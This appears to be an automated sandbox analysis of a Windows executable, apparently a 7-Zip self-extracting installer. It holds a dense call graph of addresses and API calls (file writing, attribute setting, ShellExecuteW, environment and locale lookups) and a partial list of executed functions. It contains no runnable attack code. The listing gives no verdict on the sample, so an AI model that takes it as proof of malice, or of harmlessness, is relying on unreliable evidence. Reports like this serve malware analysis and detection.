9526->9529 9528 40243b lstrcmpW 9527->9528 9530 40468a 9528->9530 9531 404633 9529->9531 9533 40243b lstrcmpW 9530->9533 9532 401f9d 19 API calls 9531->9532 9534 40463a 9532->9534 9536 4046a2 9533->9536 9535 40254d 2 API calls 9534->9535 9537 404643 9535->9537 9538 40243b lstrcmpW 9536->9538 9539 401329 2 API calls 9537->9539 9540 4046ba 9538->9540 9541 40465c 9539->9541 9543 40243b lstrcmpW 9540->9543 9542 401f9d 19 API calls 9541->9542 9544 404663 9542->9544 9545 4046d2 9543->9545 9546 40254d 2 API calls 9544->9546 9547 4046e9 9545->9547 9548 4046d9 lstrcmpiW 9545->9548 9546->9527 9549 40243b lstrcmpW 9547->9549 9548->9547 9550 4046ff 9549->9550 9551 40243b lstrcmpW 9550->9551 9552 40472c 9551->9552 9555 404739 9552->9555 9951 403d1f 9552->9951 9554 40243b lstrcmpW 9559 40474d 9554->9559 9555->9554 9556 40476d 9558 40243b lstrcmpW 9556->9558 9564 404780 9558->9564 9559->9556 9560 40243b lstrcmpW 9559->9560 9955 403cc6 9559->9955 9560->9559 9561 4047a0 9563 40243b lstrcmpW 9561->9563 9565 4047ac 9563->9565 9564->9561 9566 40243b lstrcmpW 9564->9566 9959 403cf7 9564->9959 9567 40243b lstrcmpW 9565->9567 9566->9564 9568 4047bd 9567->9568 9569 40243b lstrcmpW 9568->9569 9570 4047ce 9569->9570 9571 4047e4 9570->9571 9572 4047db _wtol 9570->9572 9573 40243b lstrcmpW 9571->9573 9572->9571 9574 4047f0 9573->9574 9575 404800 9574->9575 9576 4047f7 _wtol 9574->9576 9577 40243b lstrcmpW 9575->9577 9576->9575 9578 40480c 9577->9578 9579 40243b lstrcmpW 9578->9579 9580 404824 9579->9580 9581 40243b lstrcmpW 9580->9581 9582 40483c 9581->9582 9582->9270 9967 4023dd 9583->9967 9587 404045 9586->9587 9588 404088 9586->9588 9589 4012f7 2 API calls 9587->9589 9590 403b7f 19 API calls 9587->9590 9588->9250 9588->9251 9589->9587 9591 404062 SetEnvironmentVariableW ??3@YAXPAX 9590->9591 9591->9587 9591->9588 9593 40393b 7 API calls 9592->9593 9594 403b69 9593->9594 9595 4039f6 7 API calls 9594->9595 9596 403b74 9595->9596 9597 4027c7 6 API calls 9596->9597 9598 403b7a 9597->9598 9598->9271 9744 4083b6 9598->9744 9971 408676 9599->9971 9601 404a55 ??2@YAPAXI 9602 404a64 9601->9602 9616 40dcfb 3 API calls 9602->9616 9603 404a85 9973 40a7de _EH_prolog 9603->9973 9989 40b2fc 9603->9989 9604 404a95 9605 404ab3 9604->9605 9606 404a99 9604->9606 9608 404ada ??2@YAPAXI 9605->9608 9612 403354 86 API calls 9605->9612 9607 407776 55 API calls 9606->9607 9611 404aa1 9607->9611 9609 404ae6 9608->9609 9610 404aed 9608->9610 10014 404292 9609->10014 9995 40150b 9610->9995 9611->9317 9614 404ac6 9612->9614 9614->9608 9614->9611 9616->9603 9620 402200 LoadLibraryA GetProcAddress 9619->9620 9621 4021fb 9619->9621 9622 40221b 9620->9622 9623 402223 9620->9623 9621->9415 9621->9420 9621->9421 9622->9621 9623->9622 10477 4021b9 LoadLibraryA GetProcAddress 9623->10477 9626 40661a 2 API calls 9625->9626 9627 4049af 9626->9627 9628 401f9d 19 API calls 9627->9628 9629 4049bd 9628->9629 9630 4024fc 2 API calls 9629->9630 9631 4049c7 9630->9631 9632 4049fd 9631->9632 9634 40254d ??2@YAPAXI ??3@YAXPAX 9631->9634 9633 40254d 2 API calls 9632->9633 9635 404a0a 9633->9635 9634->9631 9636 401f9d 19 API calls 9635->9636 9637 404a11 9636->9637 9638 40254d 2 API calls 9637->9638 9639 404a1b 9638->9639 9640 4073d1 21 API calls 9639->9640 9641 404a30 ??3@YAXPAX 9640->9641 9642 404a41 ctype 9641->9642 9642->9175 9644 40e8da ctype 3 API calls 9643->9644 9645 403e7e 9644->9645 9646 40e8da ctype 3 API calls 9645->9646 9647 40e943 ??3@YAXPAX 9646->9647 9647->9169 9649 40db53 2 API calls 9648->9649 9650 404ce8 9649->9650 9651 404d44 9650->9651 9653 4024fc 2 API calls 9650->9653 9652 4025ae 2 API calls 9651->9652 9654 404d4c 9652->9654 9655 404cf7 9653->9655 9656 403e86 2 API calls 9654->9656 9659 404db5 ??3@YAXPAX 9655->9659 9661 403354 86 API calls 9655->9661 9657 404d59 9656->9657 9658 403ef6 2 API calls 9657->9658 9660 404d66 9658->9660 9673 404db1 9659->9673 9662 403ef6 2 API calls 9660->9662 9663 404d1b 9661->9663 9664 404d73 9662->9664 9663->9659 9666 40db53 2 API calls 9663->9666 9665 403ef6 2 API calls 9664->9665 9667 404d80 9665->9667 9668 404d37 9666->9668 9669 40dd5f 2 API calls 9667->9669 9668->9659 9670 404d3b ??3@YAXPAX 9668->9670 9671 404d94 9669->9671 9670->9651 9671->9659 9672 404d9d ??3@YAXPAX 9671->9672 9672->9673 9673->9234 9675 4025ae 2 API calls 9674->9675 9691 4030a8 9675->9691 9676 403301 9677 403344 ??3@YAXPAX 9676->9677 9678 40334e 9677->9678 9678->9220 9678->9226 9679 401411 ??2@YAPAXI ??3@YAXPAX 9679->9691 9681 40272e ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 9681->9691 9682 401362 2 API calls 9683 4030f3 ??3@YAXPAX ??3@YAXPAX 9682->9683 9684 403303 9683->9684 9683->9691 10485 4029c3 9684->10485 9688 40331c ??3@YAXPAX 9688->9678 9689 4031e5 strncmp 9690 4031d0 strncmp 9689->9690 9689->9691 9690->9689 9690->9691 9691->9676 9691->9679 9691->9681 9691->9682 9691->9684 9691->9689 9692 401362 2 API calls 9691->9692 9693 402640 2 API calls 9691->9693 9696 402640 ??2@YAPAXI ??3@YAXPAX 9691->9696 9698 4023dd lstrcmpW 9691->9698 9699 402f6c 7 API calls 9691->9699 9701 403330 9691->9701 9702 4032b2 lstrcmpW 9691->9702 9706 401329 2 API calls 9691->9706 10479 402986 9691->10479 10484 402425 ??3@YAXPAX ??3@YAXPAX 9691->10484 9694 403252 ??3@YAXPAX 9692->9694 9693->9690 9695 402a69 9 API calls 9694->9695 9697 403263 lstrcmpW 9695->9697 9696->9691 9697->9691 9698->9691 9699->9691 9704 402f6c 7 API calls 9701->9704 9702->9691 9703 4032c0 lstrcmpW 9702->9703 9703->9691 9705 40333c 9704->9705 10503 402425 ??3@YAXPAX ??3@YAXPAX 9705->10503 9706->9691 9709 402f86 9708->9709 9710 402f7b 9708->9710 9712 408761 4 API calls 9709->9712 10505 402668 9710->10505 9713 402f92 9712->9713 9713->9224 9714->9224 9716 4024fc 2 API calls 9715->9716 9717 40485f 9716->9717 9718 40254d 2 API calls 9717->9718 9719 40486c 9718->9719 9720 404888 9719->9720 9721 401429 2 API calls 9719->9721 9722 40254d 2 API calls 9720->9722 9721->9719 9723 404892 9722->9723 9724 40408b 94 API calls 9723->9724 9725 40489d ??3@YAXPAX 9724->9725 9725->9270 9727 4040a2 lstrlenW 9726->9727 9728 4040ce 9726->9728 9729 401a85 4 API calls 9727->9729 9728->9270 9730 4040b8 9729->9730 9730->9727 9730->9728 9731 4040d5 9730->9731 9732 4024fc 2 API calls 9731->9732 9735 4040de 9732->9735 10510 402776 9735->10510 9736 403093 84 API calls 9737 40414c 9736->9737 9738 404156 ??3@YAXPAX ??3@YAXPAX 9737->9738 9739 40416d ??3@YAXPAX ??3@YAXPAX 9737->9739 9738->9728 9739->9728 9740->9281 9742 40661a 2 API calls 9741->9742 9743 403b48 9742->9743 9743->9268 9745 408646 9744->9745 9757 4083d5 ctype 9744->9757 9745->9277 9746 40661a 2 API calls 9746->9757 9747 40243b lstrcmpW 9747->9757 9748 40786b 23 API calls 9748->9757 9750 407674 23 API calls 9750->9757 9751 407613 23 API calls 9751->9757 9752 403b40 2 API calls 9752->9757 9753 401f9d 19 API calls 9753->9757 9754 403f48 4 API calls 9754->9757 9755 4073d1 21 API calls 9755->9757 9756 407776 55 API calls 9756->9757 9757->9745 9757->9746 9757->9747 9757->9748 9757->9750 9757->9751 9757->9752 9757->9753 9757->9754 9757->9755 9757->9756 9758 407717 25 API calls 9757->9758 9759 4073d1 21 API calls 9757->9759 10520 40744b 9757->10520 9758->9757 9760 408476 ??3@YAXPAX 9759->9760 9760->9757 9762 40243b lstrcmpW 9761->9762 9763 4082fd 9762->9763 9764 40830b 9763->9764 10524 4019f0 GetStdHandle WriteFile 9763->10524 9766 40831e 9764->9766 10525 4019f0 GetStdHandle WriteFile 9764->10525 9768 408333 9766->9768 10526 4019f0 GetStdHandle WriteFile 9766->10526 9772 408344 9768->9772 10527 4019f0 GetStdHandle WriteFile 9768->10527 9770 40243b lstrcmpW 9774 408351 9770->9774 9772->9770 9773 40835f 9776 40243b lstrcmpW 9773->9776 9774->9773 10528 4019f0 GetStdHandle WriteFile 9774->10528 9777 40836c 9776->9777 9778 40837a 9777->9778 10529 4019f0 GetStdHandle WriteFile 9777->10529 9780 40243b lstrcmpW 9778->9780 9781 408387 9780->9781 9782 408395 9781->9782 10530 4019f0 GetStdHandle WriteFile 9781->10530 9784 40243b lstrcmpW 9782->9784 9785 4083a2 9784->9785 9786 4083b2 9785->9786 10531 4019f0 GetStdHandle WriteFile 9785->10531 9786->9271 9789 407636 9788->9789 9790 407658 9789->9790 9791 40764b 9789->9791 10535 407186 9790->10535 10532 407154 9791->10532 9794 407653 9795 4073d1 21 API calls 9794->9795 9796 407671 9795->9796 9796->9313 9798 407689 9797->9798 9799 40716d 2 API calls 9798->9799 9800 407694 9799->9800 9801 4073d1 21 API calls 9800->9801 9802 4076a5 9801->9802 9802->9313 9804 401411 2 API calls 9803->9804 9805 403f96 9804->9805 9806 402535 2 API calls 9805->9806 9807 403f9f GetTempPathW 9806->9807 9808 403fb8 9807->9808 9813 403fcf 9807->9813 9809 402535 2 API calls 9808->9809 9810 403fc3 GetTempPathW 9809->9810 9810->9813 9811 402535 2 API calls 9812 403ff2 wsprintfW 9811->9812 9812->9813 9813->9811 9814 404009 GetFileAttributesW 9813->9814 9815 40402d 9813->9815 9814->9813 9814->9815 9815->9298 9817 40787e 9816->9817 10541 40719f 9817->10541 9820 4073d1 21 API calls 9821 4078b3 9820->9821 9821->9317 9823 403e21 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9822->9823 9824 403e16 9822->9824 9823->9318 9825 402c86 16 API calls 9824->9825 9825->9823 9827 40243b lstrcmpW 9826->9827 9828 40455d 9827->9828 9829 404592 9828->9829 9830 401329 2 API calls 9828->9830 9829->9369 9831 40456c 9830->9831 9832 403b7f 19 API calls 9831->9832 9833 404572 9832->9833 9833->9829 9834 401429 2 API calls 9833->9834 9834->9829 9836 4012f7 2 API calls 9835->9836 9837 4043d4 9836->9837 9838 40254d 2 API calls 9837->9838 9839 4043df 9838->9839 9839->9358 9841 4021a9 9840->9841 9842 40218e LoadLibraryA GetProcAddress 9840->9842 9841->9415 9842->9841 9844 401411 2 API calls 9843->9844 9851 4048bc 9844->9851 9845 401329 2 API calls 9845->9851 9846 40494e 9847 404988 ??3@YAXPAX 9846->9847 9849 4048ab 3 API calls 9846->9849 9847->9368 9848 401429 2 API calls 9848->9851 9850 404985 9849->9850 9850->9847 9851->9845 9851->9846 9851->9848 9852 40243b lstrcmpW 9851->9852 9852->9851 9854 40661a 2 API calls 9853->9854 9855 403f50 9854->9855 9856 401411 2 API calls 9855->9856 9857 403f5e 9856->9857 9857->9342 9859 404cb1 ??3@YAXPAX 9858->9859 9860 404b15 9858->9860 9862 404cb7 9859->9862 9860->9859 9861 404b29 GetDriveTypeW 9860->9861 9861->9859 9863 404b55 9861->9863 9862->9328 9864 403f85 6 API calls 9863->9864 9865 404b63 CreateFileW 9864->9865 9866 404b89 9865->9866 9867 404c7b ??3@YAXPAX ??3@YAXPAX 9865->9867 9868 401411 2 API calls 9866->9868 9867->9862 9869 404b92 9868->9869 9870 401329 2 API calls 9869->9870 9871 404b9f 9870->9871 9872 40254d 2 API calls 9871->9872 9873 404bad 9872->9873 9874 4013e2 2 API calls 9873->9874 9875 404bb9 9874->9875 9876 40254d 2 API calls 9875->9876 9877 404bc7 9876->9877 9878 40254d 2 API calls 9877->9878 9879 404bd4 9878->9879 9880 4013e2 2 API calls 9879->9880 9881 404be0 9880->9881 9882 40254d 2 API calls 9881->9882 9883 404bed 9882->9883 9884 40254d 2 API calls 9883->9884 9885 404bf6 9884->9885 9886 4013e2 2 API calls 9885->9886 9887 404c02 9886->9887 9888 40254d 2 API calls 9887->9888 9889 404c0b 9888->9889 9890 402776 3 API calls 9889->9890 9891 404c1d WriteFile ??3@YAXPAX CloseHandle 9890->9891 9892 404c4b 9891->9892 9893 404c8c 9891->9893 9892->9893 9894 404c53 SetFileAttributesW ShellExecuteW ??3@YAXPAX 9892->9894 9895 402c86 16 API calls 9893->9895 9894->9867 9896 404c94 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9895->9896 9896->9862 9906 4022b0 9897->9906 9901 401411 2 API calls 9900->9901 9902 40273a 9901->9902 9903 402772 9902->9903 9904 402535 2 API calls 9902->9904 9903->9458 9905 402757 MultiByteToWideChar 9904->9905 9905->9903 9907 4022be ??2@YAPAXI 9906->9907 9908 4022ea 9906->9908 9907->9908 9909 4022cf ??3@YAXPAX 9907->9909 9908->9458 9909->9908 9912 401ae3 9911->9912 9915 401a97 9911->9915 9912->9465 9913 401abc CharUpperW CharUpperW 9914 401af3 CharUpperW CharUpperW 9913->9914 9913->9915 9914->9912 9915->9912 9915->9913 9916->9484 9918 403e9e 9917->9918 9919 4022b0 2 API calls 9918->9919 9920 403eac 9919->9920 9920->9498 9922 40435e 9921->9922 9923 404375 9922->9923 9924 40436a 9922->9924 9925 4025ae 2 API calls 9923->9925 9941 4025f6 9924->9941 9927 40437e 9925->9927 9928 4022b0 2 API calls 9927->9928 9929 404387 9928->9929 9931 4025f6 2 API calls 9929->9931 9930 404373 9933 403ec1 9930->9933 9932 4043b5 ??3@YAXPAX 9931->9932 9932->9930 9934 403ecd 9933->9934 9936 403ede 9933->9936 9935 4022b0 2 API calls 9934->9935 9935->9936 9936->9504 9938 403f06 9937->9938 9938->9938 9944 4022fc 9938->9944 9940 403f13 9940->9510 9942 4022b0 2 API calls 9941->9942 9943 402610 9942->9943 9943->9930 9945 402340 9944->9945 9946 402310 9944->9946 9945->9940 9947 4022b0 2 API calls 9946->9947 9947->9945 9949 4022fc 2 API calls 9948->9949 9950 40264a 9949->9950 9950->9520 9952 403d3d 9951->9952 9963 403c63 9952->9963 9956 403cd3 9955->9956 9957 403c63 _wtol 9956->9957 9958 403cf4 9957->9958 9958->9559 9960 403d04 9959->9960 9961 403c63 _wtol 9960->9961 9962 403d1c 9961->9962 9962->9564 9964 403c6d 9963->9964 9965 403c88 _wtol 9964->9965 9966 403cc1 9964->9966 9965->9964 9966->9555 9968 4023e8 9967->9968 9969 4023f4 lstrcmpW 9968->9969 9970 402411 9968->9970 9969->9968 9969->9970 9970->9273 9972 408679 9971->9972 9972->9601 9974 40a7fe 9973->9974 9975 40b2fc 11 API calls 9974->9975 9976 40a823 9975->9976 9977 40a845 9976->9977 9978 40a82c 9976->9978 10019 40cc59 _EH_prolog 9977->10019 10022 40a3fe 9978->10022 9990 40b30d 9989->9990 9994 40dcfb 3 API calls 9990->9994 9991 40b321 9992 40b331 9991->9992 10458 40b163 9991->10458 9992->9604 9994->9991 9996 40151e 9995->9996 9997 401329 2 API calls 9996->9997 9998 40152b 9997->9998 9999 401429 2 API calls 9998->9999 10000 401534 CreateThread 9999->10000 10001 401563 10000->10001 10002 401568 WaitForSingleObject 10000->10002 10471 40129c 10000->10471 10003 40786b 23 API calls 10001->10003 10004 401585 10002->10004 10005 4015b7 10002->10005 10003->10002 10008 4015a3 10004->10008 10011 401594 10004->10011 10006 4015b3 10005->10006 10007 4015bf GetExitCodeThread 10005->10007 10006->9611 10009 4015d6 10007->10009 10010 407776 55 API calls 10008->10010 10009->10006 10009->10011 10012 401605 SetLastError 10009->10012 10010->10006 10011->10006 10013 407776 55 API calls 10011->10013 10012->10011 10013->10006 10015 401411 2 API calls 10014->10015 10016 4042ab 10015->10016 10017 401411 2 API calls 10016->10017 10018 4042b7 10017->10018 10018->9610 10030 40c9fc 10019->10030 10441 40a28e 10022->10441 10052 40a0bf 10030->10052 10186 40a030 10052->10186 10187 40e8da ctype 3 API calls 10186->10187 10188 40a039 10187->10188 10189 40e8da ctype 3 API calls 10188->10189 10190 40a041 10189->10190 10191 40e8da ctype 3 API calls 10190->10191 10192 40a049 10191->10192 10193 40e8da ctype 3 API calls 10192->10193 10194 40a051 10193->10194 10195 40e8da ctype 3 API calls 10194->10195 10196 40a059 10195->10196 10197 40e8da ctype 3 API calls 10196->10197 10198 40a061 10197->10198 10199 40e8da ctype 3 API calls 10198->10199 10200 40a06b 10199->10200 10201 40e8da ctype 3 API calls 10200->10201 10202 40a073 10201->10202 10203 40e8da ctype 3 API calls 10202->10203 10204 40a080 10203->10204 10205 40e8da ctype 3 API calls 10204->10205 10206 40a088 10205->10206 10207 40e8da ctype 3 API calls 10206->10207 10208 40a095 10207->10208 10209 40e8da ctype 3 API calls 10208->10209 10210 40a09d 10209->10210 10211 40e8da ctype 3 API calls 10210->10211 10212 40a0aa 10211->10212 10213 40e8da ctype 3 API calls 10212->10213 10214 40a0b2 10213->10214 10442 40e8da ctype 3 API calls 10441->10442 10443 40a29c 10442->10443 10459 40f0b6 GetLastError 10458->10459 10461 40b17e 10459->10461 10460 40b192 10460->9992 10461->10460 10462 40adc3 3 API calls 10461->10462 10463 40b1b6 memcpy 10462->10463 10468 40b1d9 10463->10468 10464 40b297 ??3@YAXPAX 10464->10460 10465 40b2a2 ??3@YAXPAX 10465->10460 10467 40b27a memmove 10467->10468 10468->10464 10468->10465 10468->10467 10469 40b2ac memcpy 10468->10469 10470 40dcfb 3 API calls 10469->10470 10470->10465 10472 4012a5 10471->10472 10473 4012b8 10471->10473 10472->10473 10474 4012a7 Sleep 10472->10474 10475 4012f1 10473->10475 10476 4012e3 EndDialog 10473->10476 10474->10472 10476->10475 10478 4021db 10477->10478 10478->9622 10480 4025ae 2 API calls 10479->10480 10481 402992 10480->10481 10482 4029be 10481->10482 10483 402640 2 API calls 10481->10483 10482->9691 10483->10481 10484->9691 10486 4029d2 10485->10486 10487 4029de 10485->10487 10504 4019f0 GetStdHandle WriteFile 10486->10504 10489 4025ae 2 API calls 10487->10489 10493 4029e8 10489->10493 10490 4029d9 10502 402425 ??3@YAXPAX ??3@YAXPAX 10490->10502 10491 402a13 10492 40272e 3 API calls 10491->10492 10494 402a25 10492->10494 10493->10491 10497 402640 2 API calls 10493->10497 10495 402a33 10494->10495 10496 402a47 10494->10496 10498 407776 55 API calls 10495->10498 10499 407776 55 API calls 10496->10499 10497->10493 10500 402a42 ??3@YAXPAX ??3@YAXPAX 10498->10500 10499->10500 10500->10490 10502->9688 10503->9677 10504->10490 10506 4012f7 2 API calls 10505->10506 10507 402676 10506->10507 10508 4012f7 2 API calls 10507->10508 10509 402682 10508->10509 10509->9709 10511 4025ae 2 API calls 10510->10511 10512 402785 10511->10512 10513 4027c1 10512->10513 10516 402628 10512->10516 10513->9736 10517 402634 10516->10517 10518 40263a WideCharToMultiByte 10516->10518 10519 4022b0 2 API calls 10517->10519 10518->10513 10519->10518 10521 407456 10520->10521 10522 40745b 10520->10522 10521->9757 10522->10521 10523 4073d1 21 API calls 10522->10523 10523->10521 10524->9764 10525->9766 10526->9768 10527->9772 10528->9773 10529->9778 10530->9782 10531->9786 10533 40661a 2 API calls 10532->10533 10534 40715c 10533->10534 10534->9794 10538 40716d 10535->10538 10539 40661a 2 API calls 10538->10539 10540 407175 10539->10540 10540->9794 10542 40661a 2 API calls 10541->10542 10543 4071a7 10542->10543 10543->9820 8035 40f3f1 8038 4024e7 8035->8038 8043 40245a 8038->8043 8041 4024f5 8042 4024f6 malloc 8044 40246a 8043->8044 8050 402466 8043->8050 8045 40247a GlobalMemoryStatusEx 8044->8045 8044->8050 8046 402488 8045->8046 8045->8050 8046->8050 8051 401f9d 8046->8051 8050->8041 8050->8042 8052 401fb4 8051->8052 8053 401fe5 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 8052->8053 8057 401fdb 8052->8057 8054 402095 SetLastError 8053->8054 8055 40201d ??2@YAPAXI GetEnvironmentVariableW 8053->8055 8054->8057 8058 4020ac 8054->8058 8056 40204c GetLastError 8055->8056 8069 40207e ??3@YAXPAX 8055->8069 8059 402052 8056->8059 8056->8069 8071 407717 8057->8071 8061 4020cb lstrlenA ??2@YAPAXI 8058->8061 8078 401f47 8058->8078 8064 402081 8059->8064 8065 40205c lstrcmpiW 8059->8065 8062 402136 MultiByteToWideChar 8061->8062 8063 4020fc GetLocaleInfoW 8061->8063 8062->8057 8063->8062 8067 402123 _wtol 8063->8067 8064->8054 8068 40206b ??3@YAXPAX 8065->8068 8065->8069 8067->8062 8068->8064 8069->8064 8070 4020c1 8070->8061 8085 40661a 8071->8085 8074 40774e 8089 4073d1 8074->8089 8075 40773c IsBadReadPtr 8075->8074 8079 401f51 GetUserDefaultUILanguage 8078->8079 8080 401f95 8078->8080 8081 401f72 GetSystemDefaultUILanguage 8079->8081 8082 401f6e 8079->8082 8080->8070 8081->8080 8083 401f7e GetSystemDefaultLCID 8081->8083 8082->8070 8083->8080 8084 401f8e 8083->8084 8084->8080 8086 406643 8085->8086 8087 40666f IsWindow 8085->8087 8086->8087 8088 40664b GetSystemMetrics GetSystemMetrics 8086->8088 8087->8074 8087->8075 8088->8087 8090 407444 8089->8090 8091 4073e0 8089->8091 8090->8050 8091->8090 8101 4024fc 8091->8101 8093 4073f1 8094 4024fc 2 API calls 8093->8094 8095 4073fc 8094->8095 8105 403b7f 8095->8105 8098 403b7f 19 API calls 8099 40740e ??3@YAXPAX ??3@YAXPAX 8098->8099 8099->8090 8102 402513 8101->8102 8114 40112b 8102->8114 8104 40251e 8104->8093 8178 403880 8105->8178 8107 403b59 8119 40393b 8107->8119 8109 403b69 8142 4039f6 8109->8142 8111 403b74 8165 4027c7 8111->8165 8115 401177 8114->8115 8116 401139 ??2@YAPAXI 8114->8116 8115->8104 8116->8115 8118 40115a 8116->8118 8117 40116f ??3@YAXPAX 8117->8115 8118->8117 8118->8118 8201 401411 8119->8201 8123 403954 8208 40254d 8123->8208 8125 403961 8126 4024fc 2 API calls 8125->8126 8127 40396e 8126->8127 8212 403805 8127->8212 8130 401362 2 API calls 8131 403992 8130->8131 8132 40254d 2 API calls 8131->8132 8133 40399f 8132->8133 8134 4024fc 2 API calls 8133->8134 8135 4039ac 8134->8135 8136 403805 3 API calls 8135->8136 8137 4039bc ??3@YAXPAX 8136->8137 8138 4024fc 2 API calls 8137->8138 8139 4039d3 8138->8139 8140 403805 3 API calls 8139->8140 8141 4039e2 ??3@YAXPAX ??3@YAXPAX 8140->8141 8141->8109 8143 401411 2 API calls 8142->8143 8144 403a04 8143->8144 8145 401362 2 API calls 8144->8145 8146 403a0f 8145->8146 8147 40254d 2 API calls 8146->8147 8148 403a1c 8147->8148 8149 4024fc 2 API calls 8148->8149 8150 403a29 8149->8150 8151 403805 3 API calls 8150->8151 8152 403a39 ??3@YAXPAX 8151->8152 8153 401362 2 API calls 8152->8153 8154 403a4d 8153->8154 8155 40254d 2 API calls 8154->8155 8156 403a5a 8155->8156 8157 4024fc 2 API calls 8156->8157 8158 403a67 8157->8158 8159 403805 3 API calls 8158->8159 8160 403a77 ??3@YAXPAX 8159->8160 8161 4024fc 2 API calls 8160->8161 8162 403a8e 8161->8162 8163 403805 3 API calls 8162->8163 8164 403a9d ??3@YAXPAX ??3@YAXPAX 8163->8164 8164->8111 8166 401411 2 API calls 8165->8166 8167 4027d5 8166->8167 8168 4027e5 ExpandEnvironmentStringsW 8167->8168 8171 40112b 2 API calls 8167->8171 8169 402809 8168->8169 8170 4027fe ??3@YAXPAX 8168->8170 8237 402535 8169->8237 8172 402840 8170->8172 8171->8168 8172->8098 8175 402824 8176 401362 2 API calls 8175->8176 8177 402838 ??3@YAXPAX 8176->8177 8177->8172 8179 401411 2 API calls 8178->8179 8180 40388e 8179->8180 8181 401362 2 API calls 8180->8181 8182 403899 8181->8182 8183 40254d 2 API calls 8182->8183 8184 4038a6 8183->8184 8185 4024fc 2 API calls 8184->8185 8186 4038b3 8185->8186 8187 403805 3 API calls 8186->8187 8188 4038c3 ??3@YAXPAX 8187->8188 8189 401362 2 API calls 8188->8189 8190 4038d7 8189->8190 8191 40254d 2 API calls 8190->8191 8192 4038e4 8191->8192 8193 4024fc 2 API calls 8192->8193 8194 4038f1 8193->8194 8195 403805 3 API calls 8194->8195 8196 403901 ??3@YAXPAX 8195->8196 8197 4024fc 2 API calls 8196->8197 8198 403918 8197->8198 8199 403805 3 API calls 8198->8199 8200 403927 ??3@YAXPAX ??3@YAXPAX 8199->8200 8200->8107 8202 40112b 2 API calls 8201->8202 8203 401425 8202->8203 8204 401362 8203->8204 8205 40136e 8204->8205 8207 401380 8204->8207 8206 40112b 2 API calls 8205->8206 8206->8207 8207->8123 8209 40255a 8208->8209 8217 401398 8209->8217 8211 402565 8211->8125 8213 40381b 8212->8213 8214 403817 ??3@YAXPAX 8212->8214 8213->8214 8221 4026b1 8213->8221 8225 402f96 8213->8225 8214->8130 8218 4013dc 8217->8218 8219 4013ac 8217->8219 8218->8211 8220 40112b 2 API calls 8219->8220 8220->8218 8222 4026c7 8221->8222 8223 4026db 8222->8223 8229 402346 memmove 8222->8229 8223->8213 8226 402fa5 8225->8226 8228 402fbe 8226->8228 8230 4026e6 8226->8230 8228->8213 8229->8223 8231 4026f6 8230->8231 8232 401398 2 API calls 8231->8232 8233 402702 8232->8233 8236 402346 memmove 8233->8236 8235 40270f 8235->8228 8236->8235 8238 402541 8237->8238 8239 402547 ExpandEnvironmentStringsW 8237->8239 8240 40112b 2 API calls 8238->8240 8239->8175 8240->8239 11209 40e4f9 11210 40e516 11209->11210 11211 40e506 11209->11211 11214 40de46 11211->11214 11217 401b1f VirtualFree 11214->11217 11216 40de81 ??3@YAXPAX 11216->11210 11217->11216 9091 40d68d 9092 40d418 4 API calls 9091->9092 9093 40d6b1 9092->9093 9094 40d660 9 API calls 9093->9094 9095 40d6bd 9094->9095 9096 408b38 9 API calls 9095->9096 9097 40d6c5 9096->9097

                                                                  Executed Functions

                                                                  Function 00404FAA Relevance: 250.2, APIs: 103, Strings: 39, Instructions: 1671keyboardsynchronizationwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00401B37: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                                                    • Part of subcall function 00401B37: CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                                                    • Part of subcall function 00401B37: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                                                    • Part of subcall function 00401B37: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                                                    • Part of subcall function 00401B37: DispatchMessageW.USER32(?), ref: 00401B89
                                                                    • Part of subcall function 00401B37: KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                                                    • Part of subcall function 00401B37: DestroyWindow.USER32(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                                                  • GetVersionExW.KERNEL32(?,?,?,00000000), ref: 00404FCE
                                                                  • GetCommandLineW.KERNEL32(?,00000020,?,?,00000000), ref: 0040505C
                                                                    • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                                                    • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                                                    • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                                                    • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                                                    • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,00000000,00000020,?,0040508F,?,?,00000000,?,00000000), ref: 00403DA5
                                                                    • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,?,00000000), ref: 00403DAD
                                                                  • _wtol.MSVCRT ref: 0040509F
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004050F1
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405102
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040510A
                                                                  • GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,?,00000000), ref: 00405138
                                                                  • _wtol.MSVCRT ref: 00405217
                                                                  • ??2@YAPAXI@Z.MSVCRT(00000010,004177C4,004177C4,?,00000000), ref: 0040538F
                                                                    • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
